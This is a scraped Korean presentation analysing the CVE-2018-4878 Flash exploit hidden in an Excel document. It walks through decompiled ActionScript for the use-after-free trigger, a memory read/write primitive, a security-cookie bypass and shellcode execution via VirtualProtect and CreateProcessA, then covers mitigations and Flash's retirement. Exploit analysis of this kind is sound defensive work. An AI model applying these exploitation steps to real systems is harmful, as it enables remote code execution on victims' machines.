슬라이드 1

Similar documents
Microsoft Word - SecuLetter_ExploitAnalysis_CVE _Ver0.1

Black Hole Exploit Kit PDF Exploit $selectedexploit =? 3 or 4 /games/pdf.php /games/pdf2.php CVE , CVE , CVE , CVE

PowerPoint 프레젠테이션

어댑터뷰

Microsoft PowerPoint - 04-UDP Programming.ppt


PowerPoint 프레젠테이션

Deok9_Exploit Technique

Microsoft PowerPoint - ch09 - 연결형리스트, Stack, Queue와 응용 pm0100

슬라이드 1

Analytics > Log & Crash Search > Unity ios SDK [Deprecated] Log & Crash Unity ios SDK. TOAST SDK. Log & Crash Unity SDK Log & Crash Search. Log & Cras

No Slide Title

커알못의 커널 탐방기 이 세상의 모든 커알못을 위해서

rmi_박준용_final.PDF

1

MasoJava4_Dongbin.PDF

임베디드시스템설계강의자료 6 system call 2/2 (2014 년도 1 학기 ) 김영진 아주대학교전자공학과

PowerPoint 프레젠테이션

C# Programming Guide - Types

< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B

1. auto_ptr 다음프로그램의문제점은무엇인가? void func(void) int *p = new int; cout << " 양수입력 : "; cin >> *p; if (*p <= 0) cout << " 양수를입력해야합니다 " << endl; return; 동적할

- 목차 - - ios 개발환경및유의사항. - 플랫폼 ios Project. - Native Controller와플랫폼화면연동. - 플랫폼 Web(js)-Native 간데이터공유. - 플랫폼확장 WN Interface 함수개발. - Network Manager clas

Chapter 4. LISTS

3. 1 포인터란 3. 2 포인터변수의선언과사용 3. 3 다차원포인터변수의선언과사용 3. 4 주소의가감산 3. 5 함수포인터

Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 11 년 10 월 26 일수요일

<4D F736F F F696E74202D203137C0E55FBFACBDC0B9AEC1A6BCD6B7E7BCC72E707074>

11장 포인터

mytalk

chap 5: Trees

11장 포인터

초보자를 위한 C# 21일 완성

화판_미용성형시술 정보집.0305

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코

PowerPoint 프레젠테이션

신림프로그래머_클린코드.key

Microsoft PowerPoint - 8ÀÏ°_Æ÷ÀÎÅÍ.ppt

슬라이드 1

A Hierarchical Approach to Interactive Motion Editing for Human-like Figures

A Dynamic Grid Services Deployment Mechanism for On-Demand Resource Provisioning

Microsoft PowerPoint - o8.pptx

자바 프로그래밍

I T C o t e n s P r o v i d e r h t t p : / / w w w. h a n b i t b o o k. c o. k r

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks

Microsoft PowerPoint - chap02-C프로그램시작하기.pptx

02 C h a p t e r Java

JVM 메모리구조

강의10

API 매뉴얼

PowerPoint 프레젠테이션

Microsoft PowerPoint - ch07 - 포인터 pm0415

슬라이드 1

[ 마이크로프로세서 1] 2 주차 3 차시. 포인터와구조체 2 주차 3 차시포인터와구조체 학습목표 1. C 언어에서가장어려운포인터와구조체를설명할수있다. 2. Call By Value 와 Call By Reference 를구분할수있다. 학습내용 1 : 함수 (Functi

Javascript.pages

MySQL-Ch10

13주-14주proc.PDF

vm-웨어-앞부속


Poison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3

hlogin2

untitled

Secure Programming Lecture1 : Introduction

목 차 1. 개 요 배경 요약 정보 대상시스템 원리 공격 기법 및 기본 개념 Heap Spray Font 공 격..

SRC PLUS 제어기 MANUAL

Ä¡¿ì³»ÁöÃÖÁ¾

untitled

PCServerMgmt7

var answer = confirm(" 확인이나취소를누르세요."); // 확인창은사용자의의사를묻는데사용합니다. if(answer == true){ document.write(" 확인을눌렀습니다."); else { document.write(" 취소를눌렀습니다.");

Java

gnu-lee-oop-kor-lec06-3-chap7

Modern Javascript

1. 객체의생성과대입 int 형변수 : 선언과동시에초기화하는방법 (C++) int a = 3; int a(3); // 기본타입역시클래스와같이처리가능 객체의생성 ( 복습 ) class CPoint private : int x, y; public : CPoint(int a

이번장에서학습할내용 동적메모리란? malloc() 와 calloc() 연결리스트 파일을이용하면보다많은데이터를유용하고지속적으로사용및관리할수있습니다. 2

untitled

9


T100MD+

(Asynchronous Mode) ( 1, 5~8, 1~2) & (Parity) 1 ; * S erial Port (BIOS INT 14H) - 1 -

C++ Programming

NoSQL

11 템플릿적용 - Java Program Performance Tuning (김명호기술이사)

Observational Determinism for Concurrent Program Security

3ÆÄÆ®-11

Microsoft PowerPoint - additional08.ppt [호환 모드]

, ( ),, ( ), 3, int kor[5]; int eng[5]; int Microsoft Windows 4 (ANSI C2 ) int kor[5] 20 # define #define SIZE 20 int a[10]; char c[10]; float

untitled

Design Issues

예제 2) Test.java class A intvar= 10; void method() class B extends A intvar= 20; 1"); void method() 2"); void method1() public class Test 3"); args) A

bn2019_2

14-Servlet

Microsoft PowerPoint - Chapter 6.ppt

PowerPoint 프레젠테이션

Microsoft PowerPoint - java1-lab5-ImageProcessorTestOOP.pptx

유니티 변수-함수.key

(72) 발명자 이동희 서울 동작구 여의대방로44길 10, 101동 802호 (대 방동, 대림아파트) 노삼혁 서울 중구 정동길 21-31, B동 404호 (정동, 정동상 림원) 이 발명을 지원한 국가연구개발사업 과제고유번호 부처명 교육과학기술부

Multi Channel Analysis. Multi Channel Analytics :!! - (Ad network ) Report! -! -!. Valuepotion Multi Channel Analytics! (1) Install! (2) 3 (4 ~ 6 Page

초보자를 위한 분산 캐시 활용 전략

1. 상속의기본개념 다음과같은문제를위한클래스설계 자동차 속성 : 색상, 배기량, 현재속도 메서드 : 가속하라, 멈춰라, 시동을켜라 트럭 속성 : 색상, 배기량, 현재속도, 최대중량 메서드 : 가속하라, 멈춰라, 시동을켜라 택시 속성 : 색상, 배기량, 현재속도, 요금,

제 31회 전국 고교생 문예백일장 산문 부문 심사평.hwp

MPLAB C18 C

UI TASK & KEY EVENT

Transcription:

오피스문서파일 플래시객체삽입기능

엑셀에삽입한악성플래시파일 CVE-2018-4878 User Interaction? 제한된보기상태에서여는경우를제외하고플래시자동실행

이메일, 메신저, SNS 오피스 exploit.xslx 이메일 플래시익스플로잇 악성코드 메신저

익스플로잇흐름도 Office Request decode xor key (swf id, flash version, os version) Flash (Loader) decode Return decode xor key Request payload Important C2 server Flash (exploit) Return payload C2 server

익스플로잇로더 Flash object

디컴파일익스플로잇로더 Exploit (CVE-2018-4878) decode, load

익스플로잇디코드함수 (Decript?) decode Load exploit

익스플로잇플래시파일

취약점원인 (Use After Free) PrimeTime SDK DRMManager (com.adobe.tvsdk.mediacore.psdk) public function trig_uaf() : void { var ps:psdk = null; // 1. 미디어플레이어생성 var data14:psdkeventdispatcher = null; ps = PSDK.pSDK; data14 = ps.createdispatcher(); this. \x04 = ps.createmediaplayer(data14); drm_obj1=null (delayed free) // 2. DRMManager 초기화 this.drm_obj1= new DRMLIST_Obj(); // DRMOperationCompleteListener this. \x04.drmmanager.initialize(this.drm_obj1); } // 3. Null DRMOperationCompleteListener (drmmanager 는계속오브젝트참조 ) this.drm_obj1 = null; // Enter delayed free list

Force Garbage Collect public function \x01 (param1:flash01) { super(); this.flash01_obj = param1; drm_obj1=null this.trig_uaf(); (freed) try { new LocalConnection().connect("foo"); new LocalConnection().connect("foo"); // Force Garbage Collect }

Force Garbage Collect

DRMOperationCompleteListener Class Object 재할당 try { 에러발생 new LocalConnection().connect("foo"); new LocalConnection().connect("foo"); } catch(e:error) { // dangling pointer로사용 drm_obj2 = new DRMLIST_Obj(); }

Make Dangling Pointer (drm_obj2). // Timer 실행 this. \x03 = new Timer(100,1000); this. \x03.addeventlistener("timer",this.checkfreed); this. \x03.start(); // flash.display::loaderinfo -> ondrmerror -> Freed drm_obj2 } Freed drm_obj2 by drmmanager

Overlap ByteArray Class Object public function overlapping_obj() : void { this.barray_obj = new ByteArrayObj(); // overlapping bytearray class in the freed drm_obj2 this.barray_obj.length = 512; if(this.drm_obj2.a14!= 0) // drm_obj2 is dangling pointer {.

ByteArray Full memory Read / Write Primitive private: uint8_t* array; uint32_t capacity; uint32_t length; uint32_t copyonwrite; uint32_t check_array; uint32_t check_capacity; uint32_t check_length; uint32_t check_copyonwrite;

Overlapped Object Memory [drm_obj2 class memory] 프리되기전 07689100 5bda1a88 AdobeCPGetAPI+0x4de208 07689104 80004b01 07689108 077b61a0 0768910c 0778b208 07689110 00001111 -> drm_obj2.a1 07689114 00002222 07689118 00003333 0768911c 00004444 07689120 00005555 07689124 00006666 07689128 00007777 0768912c 00008888 07689130 00009999 07689134 0000aaaa 07689138 00001111 0768913c 00002222 07689140 00003333.. 07689174 00006666 07689178 00007777 0768917c 00008888 07689180 00009999 07689184 0000aaaa 07689188 00001111 0768918c 00002222 07689190 00003333 07689194 00004444 07689198 00004444 ->drm_obj2.a35 0768919c 00000000 Overlapped ByteArray Class Object 07689100 5bda18d8 AdobeCPGetAPI+0x4de058 07689104 00000003 07689108 076ad858 0768910c 07796fa0 07689110 07689118 -> drm_obj2.a1 07689114 00000044 07689118 5bda1880 AdobeCPGetAPI+0x4de000 0768911c 5bda1888 AdobeCPGetAPI+0x4de008 07689120 5bda187c AdobeCPGetAPI+0x4ddffc 07689124 5bde9984 AdobeCPGetAPI+0x526104 07689128 0781f4c0 0768912c 08f1c1f0 07689130 07ba5e80.. 07689140 5bdb3db0 <ByteArray Object> 07689144 08a45050 -> m_buffer object drm_obj2.a14 07689148 00000000 0768914c 00000000 07689150 5bda1874 Flash32_28_0_0_137!AdobeCPGetAPI+0x4ddff4 07689154 00000003 07689158 00000000 0768915c 00000011 -> barray_obj.a1.. 07689188 07689101 -> barray_obj(this) 0768918c 00000001 07689190 00000000 07689194 00000000 07689198 00000000 -> drm_obj2.a35 0768919c 00000000

Object Life Cycle

Make Fake m_buffer Object if(this.drm_obj2.a14!= 0) { // check overlap for(var i:int = 0; i < 5; i++) { }.. // 1. Dangling pointer 의 a.32 에 a.14(m_buffer) 쓰기 this.drm_obj2.a32 = this.drm_obj2.a14 + 8 * i + 7; // 2. Dangling pointer 의 a.32 는 barray_obj.a13(number 타입 ), bytearray 를이용해 Number 값을쓰고읽기 // 3. 읽어온 m_buffer object data 를 barray_obj 변수영역에써서 fake m_buffer object 를만듦 this.barray_obj.write_mbuffer_obj(i * 2 + 1,this.barray_obj.read_mbuffer_obj()); // 4. a.14( 실제 m_buffer 주소 ) 를 barray_obj.a1 (fake m_buffer pointer) 의주소로변경 this.drm_obj2.a14 = this.drm_obj2.a31 + 19 * 4 + 16-1;

Full r/w memory primitive 07689100 5bda18d8 AdobeCPGetAPI+0x4de058 07689104 00000003 07689108 076ad858 0768910c 07796fa0 07689110 07689118.. 07689140 5bdb3db0 <ByteArray Object> 07689144 (0768915c) -> Fake m_buffer 07689148 00000000 0768914c 00000000 07689150 5bda1874 Flash32_28_0_0_137!AdobeCPGetAPI+0x4ddff4 07689154 00000003 07689158 00000000 (0768915c) 52571868 07689160 00000001 07689164 00000000 -> array 07689168 ffffffff -> capacity 0768916c ffffffff -> length 07689170 00000000 -> copyonwrite 07689174 1778926e -> check_array 07689178 e8876d91 -> check_capacity 0768917c e8876d91 -> check_length 07689180 1778926e -> check_copyonwrite 07689184 00000000 07689188 07689101 0768918c 07e25239 07689190 00000000..

Bypass ByteArray security cookie mitigation // key = array ^ check_array var key:uint = this.drm_obj2.a22 ^ this.drm_obj2.a26; this.drm_obj2.a22 = 0; this.drm_obj2.a23 = 0xFFFFFFFF; this.drm_obj2.a24 = 0xFFFFFFFF; this.drm_obj2.a26 = this.drm_obj2.a22 ^ key; this.drm_obj2.a27 = this.drm_obj2.a23 ^ key; this.drm_obj2.a28 = this.drm_obj2.a24 ^ key; this.drm_obj2.a29 = this.drm_obj2.a25 ^ key; this.barray_obj.endian = Endian.LITTLE_ENDIAN;

Find window function address Vtable address Flash.ocx base address Search API address static function findvp() : uint { if(flash21.readutf().tolowercase() == virtualprotect { flash63 = Get(b + ft + \x1e\x0b * 4); c++; if(c > 1).. else { flash21.position = b + b0; if(flash21.readutf().tolowercase() == createprocessa { createprocessafunc = Get(b + ft + \x1e\x0b * 4); c++; if(c > 1) { break; } }

How to call shellcode HackingTeam 플래시익스플로잇방식이용 (Back to the 2015 년 ) // 1. 더미 victim 함수를선언 static function Payload(...a){} static function CallVP(vp:uint, xaddr:uint, xlen:uint) { // 2. Payload 함수오브젝트를생성 Payload(); // 3. Payload() 오브젝트에서 vtable 포인터를검색 var p:uint = GetAddr(Payload); var ptbl:uint = Get(Get(Get(Get(p + 8) + 0x14) + 4) + (_isdbg? 0xbc:0xb0));.. // 4. Payload s vtable 를복사 for(var i:uint; i < 0x100; i++) _v[i] = Get(p1-0x80 + i*4); // 5. VirtualProtect() 주소를저장 _v[0x20+7] = vp; // 6. VirtualProtect() 의아규먼트설정 Set(p+0x1c, xaddr); Set(p+0x20, xlen); var args:array = new Array(0x41); //set third arg = 0x40 PAGE_EXECUTE_READWRITE // 7. Payload() 의 vtable 를대체 Set(ptbl, _vaddr + 0x80); // 8. call VirtualProtect() var res = Payload.call.apply(null, args);

How to call shellcode Function Object 의 apply 호출주소변조 Atom FunctionObject::AS3_apply(Atom thisarg, Atom argarray) { thisarg = get_coerced_receiver(thisarg); // when argarray == undefined or null, same as not being there at all // see Function/e15_3_4_3_1.as if (!AvmCore::isNullOrUndefined(argArray)) { AvmCore* core = this->core(); // FIXME: why not declare argarray as Array in Function.as? if (!AvmCore::istype(argArray, ARRAY_TYPE)) toplevel()->throwtypeerror(kapplyerror); return core->exec->apply(get_callenv(), thisarg,(arrayobject*)avmcore::atomtoscriptobject(argarray)); } else {

How to call shellcode Function Object 의 apply 호출주소변조

How to call shellcode static function callvp(param1:uint, param2:uint, param3:uint) : * { var _loc10_:uint = 0; flash1000(); var _loc4_:uint = GetObjAddr(flash1000); var _loc5_:uint = Get(Get(Get(_loc4_ + 8) + 20) + 4) + (!!flash70?188:176);.. var _loc9_:vector.<uint> = new Vector.<uint>(256); while(_loc10_ < 256){ _loc9_[_loc10_] = Get(_loc6_ - 128 + _loc10_ * 4); _loc10_++; } _loc9_[32 + 7] = param1; Set(_loc4_ + 28,param2); // 첫번째파라미터 ( 쉘코드주소 ) Set(_loc4_ + 32,param3); // 두번째파라미터 ( 쉘코드길이 ) } Set(_loc5_,flash36(_loc9_) + 128); // apply 호출포인터변조 var _loc11_:array = new Array(65); // 세번째파라미터 ( 메모리플래그 ) var _loc12_:* = flash1000.call.apply(null,_loc11_); // VirtualProtect 호출 Set(_loc5_,_loc6_); Set(_loc4_ + 28,_loc7_); Set(_loc4_ + 32,_loc8_);

How to call shellcode Call VirtualProtect Parameter

How to call shellcode static function Exec() : * {.. payaddr = GetObjAddr(flash1000); payaddr = Get(Get(payAddr + 0x1C) + 8) + 4; flash69 = Get(payAddr); // 함수호출포인터쉘코드주소로변조 Set(payAddr,shellcodeAddr); before Dummy function after shellcode // CreateProcessA 호출 res = flash1000.call(null,createprocessafunc );.. }

How to call shellcode Shellcode

과거플래시취약점악용이증가할당시수동에서자동업데이트로정책변경

제한된보기 (Protected View)

제한된보기

플래시로딩알림창

플래시로딩알림창

2020 년말에 Flash 지원중단발표 Ref: https://theblog.adobe.com/adobe-flash-update/

인터넷익스플로러, 엣지브라우저 Ref: https://blogs.windows.com/msedgedev/2017/07/25/flash-on-windows-timeline/#etdkmp71exskesz6.97

구글크롬 Ref: https://www.blog.google/products/chrome/saying-goodbye-flash-chrome/

플래시 HTML5

2024 © docsplayer.org 개인정보보호 | 약관 | 지원